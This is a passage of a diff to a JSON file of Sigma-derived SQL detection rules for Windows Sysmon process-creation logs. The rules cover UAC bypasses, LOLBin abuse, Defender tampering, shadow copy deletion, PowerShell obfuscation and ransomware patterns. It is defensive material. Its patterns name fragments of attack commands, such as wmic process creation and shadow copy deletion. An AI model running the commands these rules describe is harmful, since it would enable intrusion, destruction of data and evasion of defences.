RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.009" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "status": "experimental", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1204" ], "falsepositives": [ - "Unlikely" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 